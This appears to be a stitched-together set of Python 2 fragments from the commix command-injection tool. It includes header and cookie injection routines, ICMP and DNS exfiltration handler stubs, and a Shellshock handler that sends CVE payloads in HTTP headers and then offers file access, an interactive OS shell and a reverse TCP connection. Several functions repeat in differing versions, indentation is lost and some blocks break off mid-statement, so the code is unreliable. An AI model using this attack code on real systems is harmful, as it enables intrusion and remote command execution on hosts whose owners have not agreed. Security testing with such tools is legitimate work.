def get_request_response(request):
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err_msg:
if settings.IGNORE_ERR_MSG == False:
err_msg = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print ""
print settings.print_critical_msg(err_msg)
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err_msg)
raise SystemExit()
def get_request_response(request):
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print ""
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err_msg:
if "Connection refused" in err_msg.reason:
err_msg = "The target host is not responding. "
err_msg += "Please ensure that is up and try again."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print ""
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err_msg)
raise SystemExit()
def referer_injection_test(url, vuln_parameter, payload):
def inject_referer(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
request = urllib2.Request(url)
# Check if defined extra headers.
headers.do_check(request)
request.add_header("Referer", urllib.unquote(payload))
response = opener.open(request)
return response
proxy = None
response = inject_referer(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
response = inject_referer(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + " Please ensure that is up and try again." + Style.RESET_ALL
raise SystemExit()
def icmp_exfiltration_handler(url, http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print "\n" + Back.RED + settings.ERROR_SIGN + "You need to have root privileges to run this option." + Style.RESET_ALL
os._exit(0)
if http_request_method == "GET":
#url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
def custom_header_injection(url, vuln_parameter, payload):
def inject_custom_header(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
request = urllib2.Request(url)
#Check if defined extra headers.
headers.do_check(request)
request.add_header(settings.CUSTOM_HEADER_NAME, urllib.unquote(payload))
try:
response = opener.open(request)
return response
except ValueError:
pass
if settings.TIME_RELATIVE_ATTACK :
start = 0
end = 0
start = time.time()
proxy = None
response = inject_custom_header(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy})
response = inject_custom_header(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print ""
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err_msg)
raise SystemExit()
def cookie_injection(url, vuln_parameter, payload):
def inject_cookie(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
if settings.TIME_RELATIVE_ATTACK :
payload = urllib.quote(payload)
opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload))
request = urllib2.Request(url)
# Check if defined extra headers.
headers.do_check(request)
try:
response = opener.open(request)
return response
except ValueError:
pass
if settings.TIME_RELATIVE_ATTACK :
start = 0
end = 0
start = time.time()
proxy = None
response = inject_cookie(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy})
response = inject_cookie(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
err_msg = str(err) + "."
print "\n" + settings.print_critical_msg(err_msg)
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err_msg)
raise SystemExit()
def custom_header_injection_test(url, vuln_parameter, payload):
def inject_custom_header(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
request = urllib2.Request(url)
#Check if defined extra headers.
headers.do_check(request)
request.add_header(settings.CUSTOM_HEADER_NAME, urllib.unquote(payload))
try:
response = opener.open(request)
return response
except ValueError:
pass
start = 0
end = 0
start = time.time()
proxy = None
response = inject_custom_header(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
response = inject_custom_header(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print settings.print_error_msg(err)
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
err_msg = "The target host is not responding."
err_msg += " Please ensure that is up and try again."
print "\n" + settings.print_critical_msg(err_msg)
raise SystemExit()
def cookie_injection_test(url, vuln_parameter, payload):
def inject_cookie(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload))
request = urllib2.Request(url)
# Check if defined extra headers.
headers.do_check(request)
try:
response = opener.open(request)
return response
except ValueError:
pass
start = 0
end = 0
start = time.time()
proxy = None
response = inject_cookie(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
response = inject_cookie(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \
" Please ensure that is up and try again." + Style.RESET_ALL
raise SystemExit()
def get_request_response(request):
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + " Please ensure that is up and try again." + Style.RESET_ALL
raise SystemExit()
def user_agent_injection_test(url, vuln_parameter, payload):
def inject_user_agent(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
request = urllib2.Request(url)
#Check if defined extra headers.
headers.do_check(request)
payload = urllib.unquote(payload)
request.add_header('User-Agent', payload)
response = opener.open(request)
return response
start = 0
end = 0
start = time.time()
proxy = None
response = inject_user_agent(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
response = inject_user_agent(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
print "\n" + Back.RED + "(x) Critical: The target host is not responding." + \
" Please ensure that is up and try again." + Style.RESET_ALL
raise SystemExit()
def cookie_injection_test(url, vuln_parameter, payload):
def inject_cookie(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload))
request = urllib2.Request(url)
# Check if defined extra headers.
headers.do_check(request)
try:
response = opener.open(request)
return response
except ValueError:
pass
proxy = None
response = inject_cookie(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
response = inject_cookie(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
err_msg = str(err) + "."
print "\n" + settings.print_error_msg(err_msg)
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
err_msg = "The target host is not responding."
err_msg += " Please ensure that is up and try again."
print "\n" + settings.print_critical_msg(err_msg)
raise SystemExit()
def get_request_response(request):
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print settings.print_error_msg(err)
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
err_msg = "The target host is not responding."
err_msg += " Please ensure that is up and try again."
print "\n" + settings.print_critical_msg(err_msg)
raise SystemExit()
def dns_exfiltration_handler(url, http_request_method):
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# You need to have root privileges to run this script
if os.geteuid() != 0:
err_msg = "You need to have root privileges to run this option."
print "\n" + settings.print_critical_msg(err_msg)
os._exit(0)
if http_request_method == "GET":
#url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = urllib2.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = urllib2.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print "\n" + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
def authentication_process():
auth_url = menu.options.auth_url
auth_data = menu.options.auth_data
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
request = opener.open(urllib2.Request(auth_url))
cookies = ""
for cookie in cj:
cookie_values = cookie.name + "=" + cookie.value + "; "
cookies += cookie_values
if len(cookies) != 0 :
menu.options.cookie = cookies.rstrip()
if menu.options.verbose:
success_msg = "The received cookie is " + Style.UNDERLINE
success_msg += menu.options.cookie + Style.RESET_ALL + "."
print settings.print_success_msg(success_msg)
urllib2.install_opener(opener)
request = urllib2.Request(auth_url, auth_data)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err_msg:
if settings.IGNORE_ERR_MSG == False:
print "\n" + settings.print_error_msg(err_msg)
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
def cookie_injection(url, vuln_parameter, payload):
def inject_cookie(url, vuln_parameter, payload, proxy):
if proxy == None:
opener = urllib2.build_opener()
else:
opener = urllib2.build_opener(proxy)
if settings.TIME_RELATIVE_ATTACK:
payload = urllib.quote(payload)
# Check if defined POST data
if menu.options.data:
menu.options.data = settings.USER_DEFINED_POST_DATA
request = urllib2.Request(url, menu.options.data)
else:
url = parameters.get_url_part(url)
request = urllib2.Request(url)
#Check if defined extra headers.
headers.do_check(request)
request.add_header(
'Cookie', menu.options.cookie.replace(settings.INJECT_TAG,
payload))
try:
headers.check_http_traffic(request)
response = opener.open(request)
return response
except ValueError:
pass
if settings.TIME_RELATIVE_ATTACK:
start = 0
end = 0
start = time.time()
proxy = None
#response = inject_cookie(url, vuln_parameter, payload, proxy)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler(
{settings.PROXY_PROTOCOL: menu.options.proxy})
response = inject_cookie(url, vuln_parameter, payload, proxy)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err_msg = str(err_msg) + "."
print "\n" + settings.print_critical_msg(err_msg)
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg) + "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err_msg)
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
print ""
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err_msg:
err_msg = str(err_msg.reason).split(" ")[2:]
err_msg = ' '.join(err_msg)+ "."
if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
print ""
print settings.print_critical_msg(err_msg)
raise SystemExit()
else:
try:
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \
" Please ensure that is up and try again." + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + Back.RED + settings.ERROR_SIGN + str(
err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
response = False
except urllib2.URLError, err:
if "Connection refused" in err.reason:
print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \
" Please ensure that is up and try again." + Style.RESET_ALL
raise SystemExit()
else:
try:
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
sys.stdout.write("(*) Testing the "+ technique + "... ")
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL)
header = {check_header : payload}
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
if not menu.options.verbose:
percent = ((i*100)/total)
float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(float_percent )+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vuln_parameter = "HTTP Header"
vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
logs.update_payload(filename, counter, payload)
if cve in response.info():
no_result = False
print Style.BRIGHT + "\n(!) The ("+ check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
# Enumeration options.
if settings.ENUMERATION_DONE == True :
print ""
while True:
enumerate_again = raw_input("(?) Do you want to enumerate again? [Y/n/q] > ").lower()
if enumerate_again in settings.CHOISE_YES:
enumeration(url, cve, check_header, filename)
break
elif enumerate_again in settings.CHOISE_NO:
break
elif enumerate_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if enumerate_again == "":
enumerate_again = "enter"
print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
enumeration(url, cve, check_header, filename)
# File access options.
if settings.FILE_ACCESS_DONE == True :
while True:
file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower()
if file_access_again in settings.CHOISE_YES:
file_access(url, cve, check_header, filename)
break
elif file_access_again in settings.CHOISE_NO:
break
elif file_access_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if file_access_again == "":
file_access_again = "enter"
print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
file_access(url, cve, check_header, filename)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell = cmd_exec(url, cmd, cve, check_header, filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
sys.exit(0)
else:
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
print ""
gotshell = raw_input("(?) Do you want a Pseudo-Terminal? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
while True:
try:
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
return False
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
shell = cmd_exec(url, cmd, cve, check_header, filename)
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
pass
else:
shell = cmd_exec(url, cmd, cve, check_header, filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
continue
break
else:
continue
except urllib2.HTTPError, err:
if settings.IGNORE_ERR_MSG == False:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
continue_tests = checks.continue_tests(err)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
info_msg = "Testing the " + technique + "... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + settings.print_payload(payload))
header = {check_header : payload}
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
if not menu.options.verbose:
percent = ((i*100)/total)
float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(float_percent )+ "%"
info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vuln_parameter = "HTTP Header"
vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
logs.update_payload(filename, counter, payload)
if cve in response.info():
no_result = False
success_msg = "The (" + check_header + ") '" + Style.UNDERLINE
success_msg += url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "."
print "\n" + settings.print_success_msg(success_msg)
print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
if not menu.options.verbose:
print ""
# Enumeration options.
if settings.ENUMERATION_DONE == True :
if menu.options.verbose:
print ""
while True:
question_msg = "Do you want to enumerate again? [Y/n/q] > "
enumerate_again = raw_input(settings.print_question_msg(question_msg)).lower()
if enumerate_again in settings.CHOICE_YES:
enumeration(url, cve, check_header, filename)
break
elif enumerate_again in settings.CHOICE_NO:
break
elif enumerate_again in settings.CHOICE_QUIT:
sys.exit(0)
else:
if enumerate_again == "":
enumerate_again = "enter"
err_msg = "'" + enumerate_again + "' is not a valid answer."
print settings.print_error_msg(err_msg) + "\n"
pass
else:
enumeration(url, cve, check_header, filename)
# File access options.
if settings.FILE_ACCESS_DONE == True :
while True:
question_msg = "Do you want to access files again? [Y/n/q] > "
file_access_again = raw_input(settings.print_question_msg(question_msg)).lower()
if file_access_again in settings.CHOICE_YES:
file_access(url, cve, check_header, filename)
break
elif file_access_again in settings.CHOICE_NO:
break
elif file_access_again in settings.CHOICE_QUIT:
sys.exit(0)
else:
if file_access_again == "":
file_access_again = "enter"
err_msg = "'" + file_access_again + "' is not a valid answer."
print settings.print_error_msg(err_msg) + "\n"
pass
else:
file_access(url, cve, check_header, filename)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
sys.exit(0)
else:
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
if menu.options.verbose:
print ""
question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > "
gotshell = raw_input(settings.print_question_msg(question_msg)).lower()
if gotshell in settings.CHOICE_YES:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
warn_msg = "You are already into an 'os_shell' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
if menu.options.verbose:
print ""
err_msg = "The reverse TCP connection to the target host has been failed!"
print settings.print_error_msg(err_msg)
else:
pass
else:
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
if menu.options.verbose:
print "\n" + settings.print_payload(payload)
err_msg = "The '" + cmd + "' command, does not return any output."
print settings.print_error_msg(err_msg) + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOICE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg) + "\n"
continue
break
else:
continue
